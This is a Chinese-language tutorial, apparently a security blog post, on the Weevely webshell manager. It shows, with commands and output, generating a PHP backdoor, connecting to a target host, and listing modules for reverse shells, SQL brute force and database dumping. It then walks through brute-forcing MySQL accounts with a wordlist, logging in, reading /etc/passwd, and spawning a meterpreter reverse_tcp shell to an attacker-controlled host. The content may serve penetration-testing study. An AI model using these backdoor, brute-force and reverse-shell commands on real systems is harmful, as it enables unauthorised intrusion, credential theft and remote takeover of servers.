Weevely是一款python编写的webshell管理工具,作为编写语言使用python的一款工具,它最大的优点就在于跨平台,可以算作是linux下的一款菜刀替代工具(限于php),总的来说还是非常不错的一款工具,具体的项目地址[1]。
root@kali:~# weevely
[+] weevely 3.2.0
[!] Error: too few arguments
[+] Run terminal to the target
weevely <URL> <password> [cmd]
[+] Load session file
weevely session <path> [cmd]
[+] Generate backdoor agent
weevely generate <password> <path>
root@kali:~# weevely generate test hello.php
Generated backdoor with password 'test' in 'hello.php' of 1486 byte size.
root@kali:~# find / -name hello.php
/usr/share/weevely/hello.php
目前支持的后门格式主要是php :generate.php(生成php后门文件) :generate.img(将后门代码插入到图片中,并修改.htaccess,该后门需要服务器开启.htaccess) :generate.htaccess(将后门代码插入到.htaccess,同样需要开启.htaccess支持)
root@kali:~# weevely http://192.168.110.129/hello.php test
[+] weevely 3.2.0
[+] Target: winxp-0947be9ad:C:\phpstudy\WWW
[+] Session: /root/.weevely/sessions/192.168.110.129/hello_0.session
[+] Shell: System shell
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely>shell
在虚拟终端模式下需要使用模块直接在前面加上 ’:’ 即可,或者用:help查看帮助详情
module | description |
---|---|
:audit.etcpasswd | 枚举/etc/passwd |
:audit.userfiles | 列举用户/home下具有权限的文件 |
:audit.mapwebfiles | 枚举任意Web站点的URL链接 |
:shell.php | 编写php文件 |
:shell.sh | 编写系统脚本 |
:system.info | 收集系统信息 |
:find.suidsgid | 查找SUID / SGID文件和目录 |
:find.perms | 查找权限可读/写/可执行文件和目录 |
:backdoor.tcp | TCP端口后门 |
:backdoor.reversetcp | 反弹TCP连接 |
:bruteforce.sql | 爆破指定数据库用户名密码 |
:bruteforce.sqlusers | 爆破所有数据库用户密码 |
:file.upload | 上传本地文件 |
:file.upload2web | 上传二进制/ ASCII文件至目标站点文件夹并枚举URL |
:file.enum | 在本地词表的书面枚举远程文件 |
:file.read | 读文件 |
:file.rm | 删除文件 |
:file.check | 检查远程文件的状态(md5值,大小,权限等) |
:file.download | 下载远程二进制/ ASCII文件到本地 |
:sql.console | 启动SQL控制台 |
:sql.dump | 备份数据库,即脱库 |
:net.scan | 端口扫描 |
:net.phpproxy | 安装远程php代理 |
:net.ifaces | 显示远程主机网络接口信息 |
:net.proxy | 安装隧道通信代理 |
用户名为roblast micjanost pjgomes pdpeers root
:bruteforce_sql mysql -users roblast micjanost pjgomes pdpeers root -fpwds wordlists/huge.txt
使用:sql_console连接数据库
www-data@target:/var/www/html PHP> :sql_console -u root -p Gilchrist
root@localhost SQL> show databases;
+--------------------+
| mysql |
| performance_schema |
| test |
| appdb |
+--------------------+
root@localhost SQL>
www-data@target:/var/www/html PHP> :audit_etcpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
yzer:x:1000:1000:yzer,,,:/home/yzer:/bin/bash
www-data@target:/var/www/html PHP>
# 执行该命令会自动生成msf的payload
:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 10.0.0.2
[-][meterpreter] Make sure the listener is running on another terminal as below
msfconsole -x "use exploit/multi/handler; set PAYLOAD php/meterpreter/reverse_tcp; set LHOST 10.0.0.2;
[1]
Weevely项目地址: "https://github.com/epinna/Weevely"
为你铺好的HACKWAY
长按扫码上车
你点的每个在看,我都认真当成了喜欢